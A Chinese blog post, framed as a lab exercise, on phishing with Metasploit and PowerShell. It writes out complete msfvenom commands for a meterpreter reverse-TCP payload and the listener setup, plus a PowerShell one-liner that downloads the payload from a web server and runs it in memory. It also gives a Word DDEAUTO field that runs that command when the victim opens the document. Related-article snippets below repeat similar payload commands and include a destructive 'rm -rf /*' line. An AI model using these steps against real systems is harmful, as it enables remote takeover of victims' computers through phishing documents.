MSF&Powershell进行钓鱼攻击

最新推荐文章于 2023-12-24 22:27:44 发布
最新推荐文章于 2023-12-24 22:27:44 发布
阅读量2.5k 收藏 31
点赞数 3
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/105759892
版权

一、Powershell配合MSF无文件攻击

实验环境:
靶机:win 7 >192.168.1.9
攻击机:kali>192.168.1.7
web服务器:win 10 > 192.168.1.6
本次实验的大致过程如下:

MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击者可以利用此会话完成攻击控制靶机。

实验步骤:

  1. kali生成payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1121 -f psh-reflection >x.ps1

#生成名为x.ps1的windows/x64/meterpreter/reverse_tcp的payload在这里插入图片描述
2. msf 设置监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 1121
run
# msf开始监听本机1121端口

在这里插入图片描述
3.将生成的payload放到公网服务器,确保靶机能够访问。
在这里插入图片描述

4.在靶机运行powershell脚本,实战需要其他方式运行此代码:

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps1')

代码中的地址为公网地址。通过word域代码执行powershell脚本调用web服务器poayload下载到靶机内存中执行
在这里插入图片描述
5.当靶机成功执行以上命令之后,msf会收到会话如下图,此时已经成功建立会话,可控制靶机。实验成功;
在这里插入图片描述

二、Powershell配合word钓鱼攻击

环境:
靶机:win 7 >192.168.1.9(安装有office2013)
攻击机:kali>192.168.1.7
web服务器:win 10 > 192.168.1.6

原理:
新建word文档,调用快捷键:CTRL+F9,填写域代码:

{DDEAUTO C:\\windows\\system32\\cmd.exe "/k notepad.exe}

然后保存word,再次打开时会执行代码弹出记事本程序。word可以通过域代码执行系统命令。本实验利用word域调用powershell代码从而建立会话,控制靶机。

本次实验的大致过程如下:

将MSF生成payload并放到公网(模拟)web服务器上,确保靶机能够访问。对靶机进行word钓鱼攻击。当靶机打开word文件,会下载powershell payload到本地并执行,从而建立会话进行无文件攻击。
实验步骤:

1.kali生成ps脚本:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1122 -f psh-reflection >x.ps2

#生成名为x.ps2的windows/x64/meterpreter/reverse_tcp的payload

在这里插入图片描述
2. msf 设置监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 1122
run
# msf开始监听本机1122端口

在这里插入图片描述
3.将生成的payload放到公网服务器,确保靶机能够访问。
在这里插入图片描述
4.在本地新建word文档设置域(快捷键:CTRL+F9),域内代码为:

DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps2') "

5.通过钓鱼等方式将该word文档发送到靶机诱使靶机点击文档。成功建立会话,可控制靶机。实验成功:

在这里插入图片描述

=========================================================
在这里插入图片描述

Min1996
关注
专栏目录
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShellPowershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
MSF多种渗透测试实例合集
weixin_45380284的博客
03-05 3649
MSF多种渗透测试实例合集 声明:本文漏洞均为已发布漏洞,仅供学习实验,切勿违法使用,请自己搭建靶机进行学习。 1.(MS08-067)缓冲区溢出漏洞 漏洞简介: MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏
Powershell 配合msf无文件攻击
洋洋的小黑屋
04-27 1756
生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上,这里我们放到本机搭建的apache环境中 kali设置监听,并且启动 win7中访问木马是否成功 直接在win7的cmd中执行命令 powersh...
MSF&Powershell钓鱼攻击
p01son的博客
06-02 410
Powershell是windows下面非常强大的命令行工具,Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。
谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑
tempulcc的博客
09-15 416
metaspolit配合shellter渗透windows
beef结合msf钓鱼
weixin_34174132的博客
03-17 679
Kali linux 系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannel beef/beef 嵌入代码<script src="Ip:3000/h...
msf生成webshell_用metasploit来生成Powershell后门
weixin_39959615的博客
12-22 1344
在Kali的shell中配置一个Powershell后门,针对Windows的Powershell所设计。root@kali:~# msfconsolemsf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_de...
Metasploit新特性解读:渗透测试中的PowerShell利用
# 1. Metasploit简介 Metasploit是一款开源的渗透测试框架,旨在帮助安全专业人员执行安全评估和渗透测试。它是目前业界最为知名的渗透测试工具之一,具有强大的功能和灵活的扩展性。在本章中,我们将介绍...
Metasploit深入解析:逃避检测与无文件攻击
# 1. 简介 ## 1.1 Metasploit概述 ...许多组织和安全从业者需要对其系统和网络进行渗透测试,并且需要了解如何检测和防御这些攻击,以保护其系统和数据安全。 ## 1.3 文章内容概览 本文将深入探讨Metasploit框架的基
154.网络安全渗透测试—[Cobalt Strike系列]—[钓鱼攻击/鱼叉钓鱼]
qwsn
03-26 4473
一、钓鱼攻击和鱼叉钓鱼简介 1、钓鱼攻击简介 2、钓鱼攻击模块:6个 3、鱼叉钓鱼简介 4、鱼叉钓鱼示例:邮件钓鱼 二、钓鱼攻击测试 1、测试环境 2、System Profiler(信息搜集) 3、Clone Site(克隆网站):获取键盘记录 4、生成hta后门文件+文件下载(cs上传hta)+Clone Site(克隆网站):钓鱼攻击获取cs会话 5、MSF溢出代码+CS克隆网站:钓鱼攻击获取MSF会话 三、鱼叉钓鱼测试 1、邮件钓鱼
Metasploit - Powershell
Nixawk
11-16 1390
msf post(multi_meterpreter_inject) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ----------
用kali制作一个简单的钓鱼网站
hovcfuti的博客
07-20 3862
钓鱼网站上输入的用户名和密码会直接显示到kali中,成功得到受害者的账号,这里我没有账号随便输入一个,如果输入的账号是正确的话会直接转跳到真正的网站中,直接无色无味。这时候直接访问自己kali虚拟机的IP,就会访问到一个假的网站,有些小瑕疵哈哈哈,不重要,主要是学习。这时候就可以选择攻击类型,这里我们想要制作一个简单的钓鱼网站,输入1,选择社会工程攻击,回车。输入2,选择网站攻击,回车(英语不好,都靠翻译软件,有些不准确)这时候在生成的钓鱼网站中登录,kali机会监听到一些有趣的东西。
kali钓鱼(超详细)
m0_52934166的博客
08-07 2422
kali钓鱼
一条命令上线MSF(Metasploit)-web_delivery模块
10-31 2710
一条命令上线MSF(Metasploit)-web_delivery模块
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 5053
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
windows/osx cmd/powershell 常用命令
04-06 591
序号 符号 名字 作用 备注 1 rm -rf /* 删除当前目录下的所有文件 rm:删除命令 -r开关:递归地删除子目录和子目录中的文件 -f开关:强制删除,不再一一向用户提示确认 * 所有文件和文件夹 这条命令的意思就是强制删除当前目录下的所有文件和子目录 这个命令很危险,应避免使用。 所删除的文件,一般都不能恢复 2 pwd Linux/
Kali Linux—借助 SET+MSF 进行网络钓鱼、生成木马、获主机shell、权限提升、远程监控、钓鱼邮件等完整渗透测试(一)
weixin_72849553的博客
12-24 3801
社会工程学—世界头号黑客凯文·米特尼克在《欺骗的艺术》中曾提到,这是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。SET最常用的攻击方法有:用恶意附件对目标进行 E-mail 钓鱼攻击、Java Applet攻击、基于浏览器的漏洞攻击、收集网站认证信息、建立感染的便携媒体、邮件群发等攻击手段。
msfpowershell中利用hotpotato进行提权
weixin_33755649的博客
09-19 711
本文讲的是在msfpowershell中利用hotpotato进行提权,通过类似SMB协议的NTLM认证已经被微软修补了,不过HTTP到SMB正在使用这种验证,并且还用于创建高权限服务中。因为流量包中含有NTLM凭据并且正在通过伪代理服务器,因此可以将其捕获并传递到本地SMB侦听器,作为SYSTEM权限执行任何命令。 Stephen Breen在他的...
Metasploit/PowerShell内存加载执行.NET
K8哥哥
01-01 1178
前言 随着XP和2003退出Windows系统,.NET与PowerShell在渗透中将会更吃香, 虽然.NET和PowerShell可以相互调用但PowerShell的兼容性远不如.NET, 且想要执行PowerShell,前提也需要.net环境,效率方面也是程序比脚本强 同样都可内存加载,为何非要鼓吹PowerShell呢,很多PowerShell框架或模块, 兼容性和稳定性并不好都没人说,好...
MSF钓鱼渗透攻击原理
最新发布
05-26
MSF(Metasploit Framework)是一款常用的渗透测试工具,它可以通过钓鱼攻击来获取目标计算机的访问权限。 钓鱼攻击原理是利用社交工程学原理,通过发送欺骗性的信息或者伪造网站等方式,诱导目标用户点击链接或者下载文件,从而在其计算机中植入木马或者后门程序。当攻击者获取了目标计算机的访问权限后,就可以利用漏洞或者其他方式获取敏感信息或者控制目标计算机。 MSF钓鱼渗透攻击主要分为以下几个步骤: 1. 伪造欺骗性信息:攻击者利用社交工程学原理,伪造看似真实的邮件、网站等信息,以诱导目标用户点击链接或下载文件。 2. 植入木马或后门程序:一旦目标用户点击链接或下载文件,攻击者就会在其计算机中植入木马或后门程序,从而获取访问权限。 3. 利用漏洞获取敏感信息:攻击者可以利用漏洞或其他方式获取目标计算机中的敏感信息。 4. 控制目标计算机:攻击者可以利用木马或后门程序对目标计算机进行控制,例如远程执行命令、上传下载文件等操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值